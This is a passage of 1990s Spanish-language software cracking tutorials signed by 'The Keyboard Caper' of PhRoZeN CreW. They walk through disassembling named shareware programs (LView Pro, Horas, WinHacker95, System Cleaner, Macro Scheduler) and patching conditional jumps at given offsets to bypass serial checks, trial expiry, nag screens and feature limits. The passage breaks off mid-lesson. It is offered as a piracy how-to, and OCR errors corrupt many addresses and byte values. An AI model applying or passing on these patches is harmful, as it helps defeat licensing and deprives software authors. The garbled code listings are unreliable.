- Paso 7.- Una vez desensamblado, pulsa “referencia de cadena de datos” (STRING DATA 
REFERENCB), y busca la cadena “User name and ID numbers do not...”. 


- Paso 8.- Cierra la ventana SDR, deberías ver la línea: 
* Possible StringData Ref from Data Obj -> "User name and ID numbers.. 
-> "match, please verify 1f.. 
:0041ED7D 68188F4600 push 00468F18 


:0041ED82 56 push esi 


- Paso 9.- Ok, ahora debes buscar la última comparación como CMP, JNE, JE, TEST, etc antes 
del error de la cadena. Pulsa la flecha hacia arriba hasta encontrar: 


:0041ED7B 751A jne 0041ED97 
* Possible StringData Ref from Data Obj -> "User name and ID numbers... 


-> "match, please verify 1f... 


- Paso 10.- Ahora ya sabes a donde saltará cuando has introducido un código erróneo. Ahora 
quieres ver si funcionara cuando cambias “jne” por “je”. Asegurate de que la barra verde esta en 
:0041ED7B 751A jne 0041ED97. Verás la dirección de compensación bajo la pantalla, (Offset 


0001E17Bh). Es donde puedes poner el parche para LVIEWPRO.EXE. 


- Paso 11.- Vuelve al Norton Commander, ejecuta HIEW LVIEWPRO.EXE, pulsa F4 para 
seleccionar “Decode Mode” (ASM), pulsa FS e introduce 1E17B. Deberías ver algo como: 


.0001ED7B: 751A jne .00001ED97 ---------- d) 
.0001ED7D: 68188F4600 push 000468F18 
.0001ED82: 56 push esi 


- Paso 12.- Aquí es donde puedes cambiar los bits, pulsa F3, escribe 74, pulsa F9 para grabar 
los cambios y sal de HIEW. 


- Paso 13.- Ejecuta LVIEWPRO.EXE, introduce cualquier código. Voila! Has crackeado LVP 
1.C/32!! Cuidado! Que has introducido números de serie reales? Esto saltara al mensaje de error! 
Y ahora que? 


- Paso 14.-Ejecuta de nuevo HIEW LVIEWPRO.EXE, pulsa F4, selecciona descodificar, pulsa 
FS y escribe 1E17B. Pulsa F3, escribe EB, y pulsa F9. No saltará al mensaje de error! 


Suficiente por ahora. Espero que te hallas divertido con este tutorial más de lo que yo lo hice. 


Te veré la próxima vez en el tutorial 3 para Soft-ICE 3.0. 


Que te diviertas!. 
The Keyboard Caper, 
El Fundador de PhRoZeN CreW “94 - “97 


6-8-1997 


tKKC CRACKING TUTOR, LECCIÓN 3 


Hi dudes! 


Estoy aquí en el hospital, buenas enfermeras!. Ahora me gustaría enseñarte como cracker el 
tiempo límite (fecha de terminación) y como eliminar algunos NAG's. Ya se que he prometido 
escribir un tutorial sobre Soft-ICE pero ahora mismo no puedo porque no dispongo de suficiente 
memoria para ejecutar el SICE... (Solo tengo 8 Mb de RAM en el portátil) 


Disculpame por mis errores grámaticales, espero que entiendas este pedazo! 

Ok, vamos! 

Herramientas: 

Necesitaras lo siguiente: (Yo usé estas herramientas, y doy por hecho que tú también las usarás): 
- W32Dasm 8.9 o superior (usa FTP search: W32D5M89.ZIP) 


- Hacker's View 5.65 (E-mail: sen Osuslikov.kemerovo.su) 


- FAR 1.40b (ftp://ftp.elf.stuba.sk/pub/pc/utilfile/far140b.exe) Es realmente bueno! 


Contenidos: 


1) a. Como eliminar NAG's de HORAS 2.1a (sin W32Dasm) 


b. Como crackear la fecha límite de Horas 2.1a (con W32Dasm) 


URL: http://www .basta.com 


2) a. Como crackear la fecha límite de WinHacker95 2.0b3 (con W32Dasm) 


b. Como crackear WinHacker95 2.0b3 (introduciendo cualquier n*) 


URL: http://www.wedgesoftware.com 


Como no tengo modem aquí, no pude grabar la última versión shareware, así que usé viejos 
programas para la demostración. 


Parte 1.a: Eliminar NAG's de Horas 2.1a (sin W32Dasm) 


Yo uso siempre esta parte porque es más fácil y rápida. 

- Paso 1.- Ejecuta HORAS.EXE. 

- Paso 2.- Ahora ves uno de esos fastidiosos NAG's, te gustaría eliminarlo, no? 
- Paso 3.- Bien, sal del programa. 


- Paso 4.- Ejecuta el FAR, y ve al directorio de HORAS. 


- Paso 5.- Copy HORAS.EXE a HORAS.EXX (para backup) y ejecuta HIEW HORAS.EXE 


- Paso 6.- Pulsa F4 para seleccionar el modo HEX, ahora veras la mierda HEX en 
HORAS.EXE. (No necesitas mearte los calzoncillos!) 


- Paso 7.- Recuerdas que decía la mierda del NAG? Ah, tendrías que haberla apuntado al 
ejecutar HORAS.EXE. Es algo como “Welcome to Horas” o “Horas is a shareware application” 
ect. 


- Paso 8.- Pulsa F7 para buscar, escribe “welcome”. Aparece la cadena? Ok, recuerda que el 
fichero HORAS.EXE es un programa de 32 bits, así que usara la cadena “00” entre cada carácter 
como “we lc o m e” (sin espacio entre caracteres!). 


- Paso 9.- Pulsa F7 de nuevo, pon “w” (en el campo ASCH), pulsa la flecha abajo, pon “00” (en 
el campo HEX), pulsa la flecha ón pon “e”, abajo “00”, arriba “l”, abajo “00”, arriba *“c” 
abajo “00”, arriba “o”, abajo “00”, arriba , abajo “00”, arriba “e” y deberías ver esto: 


“o ” “m ” 


EZRRZERRARRRARARRRR RARA RRARRRRRRARARRARRRA 


ÉÍ[F2:Forward /F4:Fal AAA... 


2 ASCII: welcomess2222s 


2 Hex: 77 00 65 00 6C 00 63 00 6F 00 6D 00 65 92020092... 


IBER ARRARRAR RARA RARRRRRARRARRRRRARARRARR RAR ARRRRRARARRRRA 


EXI 


- Paso 10.- Bien, pulsa intro para encotrar esta cadena. Ahora veras esto: 


- Paso 11.- Mira a FF FF 82 justo antes de la cadena “%is a shareware...” es donde se generaran 
los diálogos, recuerda solo 2 o 4 FF's y 82 bits harán el engaño!. Ahora usa las flechas para poner 
el cursor en “82”. Veras “4791C” debajo de la pantalla. Ahora pulsa F3 y cambia “82” por “7E”, 
mira debajo de la pantalla, estas en la dirección de compensación 4191C. Es donde puedes 
colocar el parche. Pulsa F9 para grabar los cambios. Alguien me dijo que en vez de poner *“7E”, 
pones “90” conseguiras el mismo efecto. 


- Paso 12.- Recuerda solo 4 FF's y 82 bits funcionarán, de otra manera te puedes joder el culo. 
A veces 2 FF's y 82 bits podrían funcionar, ahora, una vez que has cambiado “82” por **7E”, no 


se generaran los diálogos. Sal de HIEW y ejecuta HORAS.EXE. 


- Paso 13.- Ves ese NAG? No!! Has crackeado Horas 2.1a!! 


Parte 1.b: Crackear la fecha límite en Horas 2.1a (con W32Dasm) 
- Paso 1.- Ejecuta HORAS.EXE. 


- Paso 2.- Veras un mensaje de error que te dice que el tiempo de evaluación ha pasado. 
(Apunta el mensaje) y sal del programa. 


- Paso 3.- Ejecuta el FAR, y ve al directorio de Horas. 


- Paso 4.- Copia HORAS.EXE a HORAS.EXX (como backup) y copia HORAS.EXE a 
HORAS.W32 (para usar con W32Dasm) 


- Paso 5.- Ejecuta W32Dasm y desensambla HORAS.W32. 


- Paso 6.- Una vez desensamblado, pulsa STRING DATA REFERENCE, busca la cadena “the 
evualuation period for this product has expired. Please..”. Haz doble clic sobre ella. 


- Paso 7.- Cierra la ventana SDR, y deberías ver esta línea: 


* Possible Reference to String Resource ID=25016: "The evaluation per.. 


:0040C975 68B8610000 push 000061B8 


- Paso 8.- Bien, pulsa la flecha hacia arriba hasta ver: 


* Referenced by a (U)nconditional or (Cjonditional Jump at Addresses: 


[:0040C904 (C), :0040C918 (C), :0040C92D (C) 


- Paso 9..- Ahora pulsa página arriba (RePág o PgUp) 2 o 3 veces hasta encontrar: 


:0040C8F7 85C0 


:0040C8F9 0F85BD000000 


:0040C8FF 8B4628 


:0040C902 85C0 


:0040C904 756B 


:0040C906 8B17 


:0040C908 51 


:0040C909 8BC4 


test eax, eax 
jne 0040C9BC 
mov eax, dword ptr [esi+28] 
test eax, eax 
jne 0040C971 
mov edx, dword ptr [edi] 
push ecx 


mov eax, esp 


Paso 10.- Mira a 0040C904, recuerdas la dirección a la que se hacia referencia? Ahora busca 


hasta encontrar la última comparación como “test”, “jne” ect. Mira a 0O40C8F7, es a donde se 
saltará cuando el tiempo de evaluación a acabado. Asegurate de que la barra verde esta en 
0040C8F9 0F385BD000000 jne 0040C9BC y con esto verás la dirección de compensación bajo la 
pantalla, (GO Offset 0ODOBCEF9h), es donde puedes hacer el parche para HORAS.EXE. 


Paso 11.- Vuelve a FAR, ejecuta HIEW HORAS.EXE, pulsa F4 para seleccionar modo 
descodificador (ASM), pulsa FS, y pon BCF9, deberías ver lo siguiente: 


.0000C8F9: 0F34BD000000 


je  .00000C9BC =-=-------- (1) 


.0000CSFF: 8B4628 mov  eax,[esi][00028] 


.0000C902: 85C0 test eax,eax 


- Paso 12.- Aquí es donde puedes cambiar los bits, pulsa F3, pon 0F85, pulsa F9 para guardar 
los cambios y sal de HIEW. 


- Paso 13.- Ejecuta HORAS.EXE, ha caducado el tiempo de prueba? Voila! Has crackeado 
Horas 2.1*!! 


Parte 2.a: Como crackear el tiempo límite de WinHacker95 2.0b3 (con W32Dasm) 


- Paso 1.- Ejecuta WH95.EXE 


- Paso 2.- Verás el mensaje que dice que se ha acabado el tiempo de prueba, 
o que tendras que registrarte para que continue funcionando. (Apunta el 
mensaje) y sal del programa. 


- Paso 3.- Ejecuta el FAR, y ve al directorio de WH59S. 


- Paso 4.- Copia WH9S5.EXE a WH95.EXX (como backup) y copia 
WHO9S.EXE a WH95.W32 (para usar con W32Dasm), 


- Paso 5.- Ejecuta W32Dasm y desensambla WH95.W32. 


- Paso 6.- Una vez desensamblado, haz click en STRING DATA 
REFERENCE, busca la cadena “Y our trial period is over!”. Recuerda el mensaje 
y haz doble click sobre el. 


- Paso 7.- Cierra la ventana SDR, deberías ver la línea: 


* Possible StringData Ref from Data Obj ->"Y our trial peroid is over!" 


:00429977 6844D34400 push 0044D344 


:0042997C 8D8208020000 lea eax, dword ptr [edx+00000208] 


:00429982 50 push eax 


- Paso $.- Bien, pulsa la flecha hacia arriba hasta ver: 


* Referenced by a (U)jnconditional or (C)onditional Jump at Addresses: 


[:004298AE (C) 


- Paso 9.- Ahora pulsa la tecla página arriba 4 o 5 veces hasta ver: 


:004298AE 0F82A 1000000 3b 00429955 

:004298B4 7517 jne 004298CD 

:004298B6 51 push ecx 

:004298B7 8D8208020000 lea eax, dword ptr [edx+00000208] 


- Paso 10.- Mira a 004298AE, recuerdas la dirección a la que se hacía 
referencía? Es a donde se saltará cuando el tiempo límite ha pasado. Vamos a 


buscarla. Asegurate de que la barra vefde esta en :004298AE 0F82A 1000000 jb 
004299553 y verás la dirección de compensación bajo la pantalla, (Offset 
00028CAEh). Es donde puedes poner el parche para WH9S.EXE. 


- Paso 11.- Vuelve al FAR, ejecuta HIEW WH9S.EXE, pulsa F4 para 
seleccionar modo descodificador (ASM), pulsa FS y pon 28CAE. Deberías ver 


algo como: 
.000298AE: 0F32A 1000000 jJb  .000029935 oa<o---- (1) 
.000298B4: 7517 jne .0000298CD =--------- (2) 
.000298B6: 51 push ecx 


- Paso 12.- Aquí es donde puedes cambiar los bits, pulsa F3, pon 
EB0090909090, y pulsa F9 para guardar. EBOO dirá que no salte pero que 
continue en la línea siguiente, y 90909090 hará de ellos NOP, lo tienes? Sal de 
HIEW. 


- Paso 13.- Ejecuta WH9SEXE, ha caducado? Voila! Has crackeado el 
WHDS 2.0b3!! 


Parte 2.b: Como crackear WH095 2.0b3 (al introducir cualquier n* de 
serie) 


- Paso 1.- Ejecuta WH9S.EXE. 


- Paso 2.- Pon “TKC/Pc “97” en Nombre, en compañía “PC “97”, y en n* “12345” y pulsa en 
registrar. 


- Paso 3.- Has visto el mensaje de error. (Apuntalo) y sal del programa. 
- Paso 4.- Ejecuta el FAR, y ve al directorio de WHO9S5. 


- Paso 5.- Copia WH9S.EXE a WH95.EXX (como backup), y copia WH9S5.EXE a WH95.W32 
(para usar con W32Dasm). 


- Paso 6.- Ejecuta W32Dasm y desensambla WH95.W32. 


- Paso 7.- Una vez desensamblado, haz click en STRING DATA REFERENCE, busca la 
cadena “Invalid Serial Number!”. (Recuerda este mensaje de error) Haz doble click en el. 


- Paso 8.- Cierra la ventana SDR, deberías ver la línea: 
* Possible StringData Ref from Data Obj ->"Invalid Serial Number!" 
:00429719 68E0D24400 push 0044D2E0 


:0042971E 8D4DF0 lea ecx, dword ptr [ebp-10] 


- Paso 9.- Bien, ahora debes buscar la última comparación como CMP, JNE, JE, TEST ect, 
antes del error de la cadena. Pulsa la flecha hacia arriba hasta encontrar: 


:004296FB 7474 je 00429771 
:004296FD 8B4DF0 mov ecx, dword ptr [ebp-10] 


:00429700 C7416C00000000 mov [ecx+6C], 00000000 


- Paso 10.- Ahora sabes a donde saltará cuando has introducido un código erróneo. Vamos a 
probar si todo funciona cuando cambiamos “je” por “j¡ne” o “eb”. Asegurate de que la barra verde 
esta en :004296FB 7474 je 00429771, verás la dirección de compensación bajo la pantalla, 


(OOffset 0O028AFBh). Es donde puedes hacer el parche para WH95.EXE. 


- Paso 11.- Vuelve a FAR, ejecuta HIEW WH9S5.EXE, pulsa F4 para seleccionar modo 
descodificador (ASM), pulsa F5 y pon 28AFB. Deberías ver algo como: 


.000296FB: 7474 je .000029771  =--------- (1) 


.000296FD: 8B4DF0 mov  ecx,[ebp][-0010] 


00029700: C7416C00000000 mov  d,[ecx][0006C],000000 


- Paso 12.- Aquí es donde puedes cambiar los bits, pulsa F3, pon EB, pulsa F9 para grabar y sal 
de HIEW. 


- Paso 13.- Ejecuta WH9S5.EXE, pon cualquier código, funciona? No te mees, continúa. 
- Paso 14.- Ejecuta de nuevo WH95.EXE. 


- Paso 15.- Pon “TKC/PC “97” en nombre, en compañía “PC “97”, y en n” de serie “12345” y 
pulsa registrar. 


- Paso 16.- Verás otro mensaje de error. (Apuntalo) y sal del programa. 


- Paso 17.- Vuelve al W32Dasm, haz click en STRING DATA REFERENCE, y busca la 
cadena “Error 1000: Invalid Serial Number!”. Recuerda este mensaje, haz doble click en el. 


- Paso 18.- Cierra la ventana SDR, deberías ver la línea: 
* Possible StringData Ref from Data Obj ->"Error 1000: Invalid Serial..”" 
:004229C3 686CCE4400 push 0044CE6C 


:004229C8 E8C3030000 call 00422D90 


- Paso 19.- Bien, ahora debes buscar la última comparación como CMP, JNE, JE, TEST, ect 
antes del error de la cadena. Pulsa la flecha hacia arriba hasta encontrar: 


:004229BC 7424 je 004229E2 
:004229BE 6A3B push 0000003B 


:004229C0 8B4DEC mov ecx, dword ptr [ebp-14] 


- Paso 20.- Ahora sabes a donde saltará el programa cuando has introducido un código erróneo. 
Vamos a probar si todo funcionará cuando cambiamos “je” por ¡ne” o “eb”. Asegurate de que la 
barra verde esta en :004229BC 7424 je 004229E2, verás la dirección de compensación debajo de 


la pantalla, (EOffset 00021DBCh). Es donde puedes poner el parche para WH95.EXE. 


- Paso 21.- Vuelve al FAR, ejecuta HIEW WH95.EXE, pulsa F4 para activar modo 
descodificador (ASM), pulsa F5 y pon 21DBC. Deberías ver algo como:+ 


.000229BC: 7424 je  .0000229E2 ==-=------ (1) 
.000229BE: 6A3B push 03B 
.000229C0: 8B4DEC mov  ecx,[ebp][-0014] 


- Paso 22.- Aquí es donde puedes cambiar los bits, pulsa F3, pon EB, pulsa F9 para grabar y sal 
de HIEW. 


- Paso 23.- Ejecuta WH95.EXE, pon cualquier código y... Voila! Has crackeado 2.0b3!! 
Bien, suficiente por ahora. Espero que te hallas divertido con este tutorial tanto como yo lo hice. 


Te vere la próxima vez en el tutorial $4. 


Que te divietas! 
The Keyboard Caper, 
The Founder of PhRoZeN CreW “94 - “977 


27-8-1997 


tKC CRACKING TUTOR, LECCIÓN 4 


Hi dudes! 


Cuatro meses sin tutorial! Phew, pero como puedes ver estoy de vuelta en la escena del cracking 
(yea, estoy de vuelta en tu PC, no estas contento?) ] . Ok, lets rock, en este tutorial te enseñare 
como eliminar límites de intervalos y como activar rasgos mutiladores en algunas aplicaciones (y 
como registrar tu bebé) ] . 


(Todavía no puedo hablarte sobre Soft-ICE, sigo con el portátil). En el próximo tutorial 
hablaremos de IDA (Interactive Disassembler). 


Discúlpame por mis errores grámaticales, espero que entiendas este pedazo! ] 


Herramientas: 


Necesitaras las siguientes: (Yo usé estas herramientas, y doy por hecho que tú también las 
usarás): 


- W32Dasm 8.9 o superior. 


- Hacker's View 5.66 (E-mail: sen Osuslikov.kemerovo.su) 


- FART1.50b (ftp://ftp.elf.stuba.sk/pub/pc/utilfile/farl140b.exe) Es realmente bueno! O Windows 
Commander 3.50 beta 5 (http://www.ghisler.com) 


Contenidos: 


1) a. Como crackear el tiempo de evaluación de System Cleaner 1.21 (con W32Dasm)URL: 
http://infortech.reedes.com 


b. Como desviar el NAG sobre fecha inválida en System Cleaner 1.21 (con W32Dasm) 


URL: http://infortech.reedcs.com 


2) a. Como activar rasgos mutiladores de Macro Schedular 4.3.11 (con W32Dasm) 


URL: http://www.mjnet.com 


3) Como crackear TrayCal 1.0 (para introducir cualquier código) 


URL: http://www.spaeder.com 


4) Porque copio ficheros *.EXE a *.W32. 


5) Código fuente ASM para parches, por Nop/PC “97 


Parte 1.a: Crackear el tiempo de evaluación de System Cleaner 1.21 
(con W32Dasm) 


- Paso 1.- Ejecuta System Cleaner.EXE 


- Paso 2.- Ahora verás el mensaje de error que dice que el período de evaluación ha pasado. 
(Apunta el mensaje) y sal del programa. 


- Paso 3.- Sigamos. 
- Paso 4.- Ejecuta WC, y ve al directorio de System Cleaner. 


- Paso 5.- Copia SystemCleaner.EXE a Systemcleaner.EXX (como backup) y copia 
SystemCleaner.EXE a SystemCleaner.W32 (para usar con W32Dasm) 


- Paso 6.- Ejecuta W32Dasm y desensambla SystemCleaner.W32. 


- Paso 7.- Una vez desensamblado, haz click en STRING DATA REFERENCE, busca la 


cadena “The trial period has ended. Please...”. (Recuerda este mensaje de error) Haz doble click 
en el. 


- Paso 8.- Cierra la ventana SDR, deberías ver la línea: 
:00464BB6 668B0DE44B4600 mov cx, word ptr [00464BF4] 
:00464BBD B202 mov dl, 02 
* Possible StringData Ref from Code Obj ->"The trial period has ended. Please " 
->"register this software!" 
- Paso 9.-Bien, pulsa la flecha hacia arriba hasta encontrar: 
:00464BAS 53 push ebx 
:00464BA9 8BD8 mov ebx, eax 
:00464BAB 80BB0C01000000 cmp byte ptr [ebx+0000010C], 00 
:00464BB2 741C je 00464BDO 


:00464BB4 6A00 push 00000000 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:00464B4F(C) 


- Paso 10.- Mira sobre la referencia del salto en 00464B4F (C), pulsa 2 o 3 veces Página arriba 
hasta ver: 


:00464B4F 7065 jo 00464BB6 
Y mira abajo hasta ver: 


:00464B54 64 BYTE 064h 


Si ves la cadena “BYTE xxxh” ignorala!! No es un salto real, son solo cadenas, bien, vuelve a la 
dirección 00464BAS8. Ahora encontraras una comparación, mira a 464BB2, es a donde se saltará 
cuando el tiempo de evaluación a caducado. Let's try. 


Asegurate de que la barra verde esta en 00464BB2 741C je 00464BDO y verás la dirección de 
compensación bajo de la pantalla, (E Offset 0O0063FB2h). Es donde puedes hacer el parche para 
SystemCleaner.EXE. 


- Paso 11.- Vuelve a WC, ejecuta HIEW SYSTEM-1.EXE, pulsa F4 para seleccionar modo 
descodificador (ASM), pulsa FS y pon 63FB2. Deberías ver algo como: 


.00064BB2: 741C je  .000064BDO ---------- (1) 
.00064BB4: 6A00 push 000 
.00064BB6: 668B0DE44B4600 mov  cx,[000464BK4] 


- Paso 12.- Aquí es donde puedes cambiar los bits, pulsa F3, pon EB, pulsa F9 para grabar y sal 
de HIEW. 


- Paso 13.- Ejecuta SystemCleaner.EXE, a caducado el tiempo de evaluación, Voila! Lo has 
hecho!!. 


Parte 1.b: Desviar el NAG sobre fecha inválida en System Cleaner 1.21 
(con W32Dasm) 


(Esto se usa sólo sí has cambiado la fecha de 12/25/98, por ejemplo a 12/25/97. Veras un NAG 
que te dice “ The system clock has been moved back. Please reset system clock to correct blah 
blah...”). 


- Paso 1.- Ejecuta System Cleaner.EXE 


- Paso 2.- Ahora veras el mensaje de error que dice que la fecha del sistema ha sido 


modificada. (Apunta el mensaje) y sal del programa. 
- Paso 3.- Sigamos. 
- Paso 4.- Ejecuta WC, y ve al directorio de System Cleaner. 


- Paso 5.- Copia SystemCleaner.EXE a Systemcleaner.EXX (como backup) y copia 
SystemCleaner.EXE a SystemCleaner.W32 (para usar con W32Dasm) 


- Paso 6.- Ejecuta W32Dasm y desensambla SystemCleaner.W32. 


- Paso 7.- Una vez desensamblado, haz click en STRING DATA REFERENCE, busca la 
cadena “The system clock has been moved back”. (Recuerda este mensaje de error) Haz doble 
click en el. 


- Paso 8.- Cierra la ventana SDR, deberías ver la línea: 
:00464E56 668B0D884E4600 mov cx, word ptr [00464E88] 
:00464E5D B201 mov dl, 01 
* Possible StringData Ref from Code Obj ->"The system clock has been moved " 


->"back. Please reset system 
clock ->"to correct time 
before re-ruming " 


- Paso 9.-Bien, pulsa la flecha hacia arriba hasta encontrar: 
:00464E48 53 push ebx 
:00464FE49 8BD8 mov ebx, eax 
:00464E4B 80BB0C01000000 cmp byte ptr [ebx+0000010C], 00 


:00464E52 7421 je 00464E75 


:00464E54 6A00 push 00000000 


:00464E56 668B0D884E4600 mov cx, word ptr [00464E88] 


- Paso 10.- Mira a 00464E52, es a donde se saltará cuando el reloj ha sido cambiado. Let's see. 
Asegurate de que la barra verde esta en 00464E52 7421 je 00464E75 y verás la dirección de 
compensación bajo la pantalla, (Offset 0O064252h). Es donde puedes hacer el parche de 
SystemCleaner.EXE. 


- Paso 11.- Vuelve a WC, ejecuta HIEW SYSTEM-1.EXE, pulsa F4 para seleccionar modo 
descodificador (ASM), pulsa FS y pon 63FB2. Deberías ver algo como: 


.00064E32: 7421 jmps .000064E75  ---------- (1) 
.00064E34: 6A00 push 000 
.00064E36: 668B0D884E4600 mov  cx,[000464E88] 


- Paso 12.- Aquí es donde puedes cambiar los bits, pulsa F3, pon EB, pulsa F9 para grabar y sal 
de HIEW. 


- Paso 13.- Ejecuta SystemCleaner.EXE, se queja, Voila! Lo has hecho!!. 


Parte 2: Activar rasgos mutiladores en Macro Schedular 4.3.11 (con 
W32Dasm) 


- Paso 1.- Ejecuta MSCHED.EXE 


- Paso 2.- Intenta añadir más macros y te dira que tiene un límite de 2 macros. Apunta este 
mensaje y sal del programa. 


- Paso 3.- Ejecuta WC, y ve al directorio de MSCHED. 


- Paso 4.- Copia MSCHED.EXE a MSCHED.EXX (como backup) y copia MSCHED.EXE a 
MSCHED.W32 (para usar con W32Dasm) 


- Paso 5.- Ejecuta W32Dasm y desensambla MSCHED.W32. 


- Paso 6.- Una vez desensamblado, haz click en STRING DATA REFERENCE, busca la 
cadena “Unregistered copies of MS are limited to...”. (Recuerda este mensaje de error) Haz doble 
click en el. 


- Paso 7.- Cierra la ventana SDR, deberías ver la línea: 
* Possible StringData Ref from Code Obj ->"Unregistered copies of Macro.." 
->"have a limit of 20 lines per..” 


:00448AED B860954400 mov eax, 00449560 


- Paso 8.-Bien, pulsa la flecha hacia arriba hasta encontrar: 


:00448ACA 7530 jne 00448 AFC 

:00448 ACC 8B8370020000 mov eax, dword ptr [ebx+00000270] 
:00448AD2 8B80FC000000 mov eax, dword ptr [eax+000000éFC] 
:00448AD8 8B10 mov edx, dword ptr [eax] 
:00448ADA FF3210 call [edx+10] 

:00448ADD 83F813 emp eax, 00000013 

:00448AE0 7ElA jle 00448 AFC 

:00448AE2 6A00 push 00000000 


- Paso 9.- Mira a las direcciones 00448ACA y 00448AEO, es a donde se saltará cuando se 
queja. Let's find it. Asegurate de que la barra verde esta en 00448ACA 7530 ¡ne 00448AFC y 


verás la dirección de compensación bajo la pantalla, (E Offset 0O047ECAh). Es donde puedes 


hacer el parche para MSCHED.EXE. 


- Paso 10.- Vuelve a WC, ejecuta HIEW MSCHED.EXE, pulsa F4 para seleccionar modo 
descodificador (ASM), pulsa FS y pon 63FB2. Deberías ver algo como: 


.00048ACA: 7530 


.00048ACC: 8B8370020000 


.00048AD2: 8B80FC000000 


.00048AD38: 8B10 


.00048ADA: FF5210 


.00048ADD: 83F813 


.00048AEO: 7ElA 


jne .000048AFC =--------- (1) 


mov  eax,[ebx][000000270] 


mov  eax,[eax][0000000FC] 


mov  edx,[eax] 


call d,[edx][00010] 


cmp  eax,013 


jle .000048AFC  =-=-------- (2) 


- Paso 11.- Aquí es donde puedes cambiar los bits, pulsa F3, pon EB y ve hacia abajo hasta 
T7ElA (Offset 47EEO), pon EB, pulsa F9 para grabar y sal de HIEW. 


- Paso 12.- Todavía no esta listo! Abre la ventana SDR y haz doble click en “Unregistered 


copies...” otra vez. 


- Paso 13.- Cierra la ventana SDR, y deberías ver la línea: 


* Possible StringData Ref from Code Obj ->"Unregistered copies of Macro.." 


:0044DB9E B86CDC4400 


->"have a limit of 20 lines per..” 


mov eax, 0044DC6C 


- Paso 14.- Bien, pulsa la flecha arriba hasta encontrar: 


:0044DB7D 752€ 


:0044DB7F 8B83D4090000 


:0044DB85 8B80FC000000 


:0044DB8B 8B 10 


:0044DB8D FF5210 


:0044DB90 48 


:0044DB91 7E18 


jne 0044DBAB 
mov eax, dword ptr [ebx+000009D4] 
mov eax, dword ptr [eax+000000FC] 
mov edx, dword ptr [eax] 
call [edx+10] 
dec eax 


jle 0044DBAB 


- Paso 15.- Mira a las direcciones 0044DB7D y 0044DB91. Es a donde se saltará cuando se 
queje. Let's find out. Asegurate de que la barra verde esta en 0044DBD7D 752C jne 0044DBAB 
y verás la dirección de compensación bajo la pantalla, (Offset 0O04CF7Dh). Es donde puedes 


hacer el parche para MSCHED.EXE. 


- Paso 16.- Vuelve a WC, ejecuta HIEW MSCHED. Pulsa F4 para seleccionar modo 
descodificador (ASM), pulsa FS y pon 4CF7D. Deberías ver algo como: 


.0004DB7D: 752C 


.0004DB7F: 8B83D4090000 


.0004DB85: 8B80FC000000 


.0004DB8B: 8B10 


.0004DB8D: FF5210 


.0004DB90: 48 


.0004DB91: 7E18 


jne .00O004DBAB — ---------- (1) 
mov  eax,[ebx][0000009D4] 
mov  eax,[eax][0000000FC] 

mov  edx,[eax] 

call d,[edx][00010] 

dec  eax 


jle .OO004DBAB  ---------- 0) 


- Paso 17.- Aquí es donde puedes cambiar los bits, pulsa F3, pon EB y ve hacia abajo hasta 
7E18 (Offset 47F91), pon EB, pulsa F9 para grabar y sal de HIEW. 


- Paso 18.- Todavía no esta listo! Abre la ventana SDR y haz doble clic sobre “Unregistered 
copies..” otra vez. 


- Paso 19.- Cierra la ventana SDR, y deberías ver la línea: 


* Possible StringData Ref from Code Obj ->"Unregistered copies of Macro.." 
->"have a limit of 20 lines per.." 


:00450D3F B8001D4500 mov eax, 00451D00 


- Paso 20.- Bien, pulsa la flecha hacia arriba hasta ver: 
:00450D21 74CC je 00450CEF 
:00450D23 8BC7 mov eax, edi 
:00450D25 ES6635FBFF call 00404290 
:00450D2A ESC919FBFF call 004026F8 
:00450D2F 83FB14 emp ebx, 00000014 


:00450D32 7E1A jle 0O450D4E 


- Paso 21.- Mira a la dirección 00450D32. Es a donde se saltará cuando se queje otra vez. Let's 
find out. Asegurate de que la barra verde esta en 00450D32 7E1A jle 00450D4E y verás la 


dirección de compensación bajo la pantalla, (Offset 00050132h). Es donde puedes hacer el 
parche para MSCHED.EXE. 


- Paso 22.- Vuelve a WC, ejecuta HIEW MSCHED.EXE, pulsa F4 para seleccionar modo 
descodificador (ASM), pulsa FS, y pon 4CF7D. Deberías ver algo como: 


.00050D32: 7E1A jle .000050D4E  ---------- (4) 
.00050D34: 6A00 push 000 
.00050D36: 668B0DF41C4500 mov  cx,[000451CF4] 


- Paso 23.- Aquí es donde puedes cambiar los bits, pulsa F3, pon EB, pulsa F9 para guardar los 
cambios y sal de HIEW. 


- Paso 24.- Todavía no esta listo! (una vez más)] . Abre la ventana SDR y haz doble click 
sobre “Unregistered copies...” otra vez. 


- Paso 25.- cierra la ventana SDR, deberías ver la línea: 
* Possible StringData Ref from Code Obj ->"Unregistered copies of Macro.." 
->"have a limit of 20 lines per..” 


:00452D25 B8E82F43500 mov eax, 00452FE8 


- Paso 26.- Bien, pulsa la flecha hacia arriba hasta ver: 
:00452D01 7531 jne 00452D34 
:00452D03 8B45FC mov eax, dword ptr [ebp-04] 
:00452D06 8B80D4090000 mov eax, dword ptr [eax+000009D4] 
:00452D0C 8B80FC000000 mov eax, dword ptr [eax+000000FC] 


:00452D12 8B 10 mov edx, dword ptr [eax] 


:00452D14 FF5210 call [edx+10] 
:00452D17 48 dec eax 


:00452D18 7E1A jle 00452D34 


- Paso 27.- Mira a las direcciones 00452D01 y 00452D18. Es a donde saltará cuando se queje. 
Let's find out. Asegurate de que la barra verde esta en 00452D01 7531 ¡ne 00452D34 y verás la 
dirección de compensación bajo la pantalla, (Offset 00052101h). Es donde puedes hacer el 
parche para MSCHED.EXE. 


- Paso 28.- Vuelve a WC. Ejecuta HIEW MSCHED.EXE, pulsa F4 para seleccionar modo 
descodificador (ASM), pulsa FS y pon 52101. Deberías ver algo como: 


.00052D01: 7531 jne .000052D34 ---------- d) 
.00052D03: 8B45FC mov  eax,[ebp][-0004] 
.00052D06: 8B80D4090000 mov  eax,[eax][0000009D4] 
.00052D0C: 8B80FC000000 mov  eax,[eax][0000000FC] 
.00052D12: 8B10 mov  edx,[eax] 

.00052D 14: FEFS5210 call d,[edx][00010] 

.00052D 17: 48 dec  eax 

.00052D18: TELA jle .000052D34 ---------- Q) 


- Paso 29.- Aquí es donde puedes cambiar los bits, pulsa F3, pon EB y ve hacia abajo hasta 
T7ElA (Offset 52118), pon EB, pulsa F9 para grabar y sal de HIEW. 


- Paso 30.- Finalmente, ejecuta MSCHED.EXE e intenta añadir más macros o más de 20 líneas 
en un script. Funciona? Kewl, lo has hecho!! 


Parte 3: Crackear TrayCal 1.0 (para introducir cualquier código) 
- Paso 1.- Ejecuta TRAYCAL.EXE 


- Paso 2.- Pon tu nombre y algún código, veras el mensaje de error que te dice que has 
introducido un código inválido. (Apunta el mensaje) y sal del programa. 


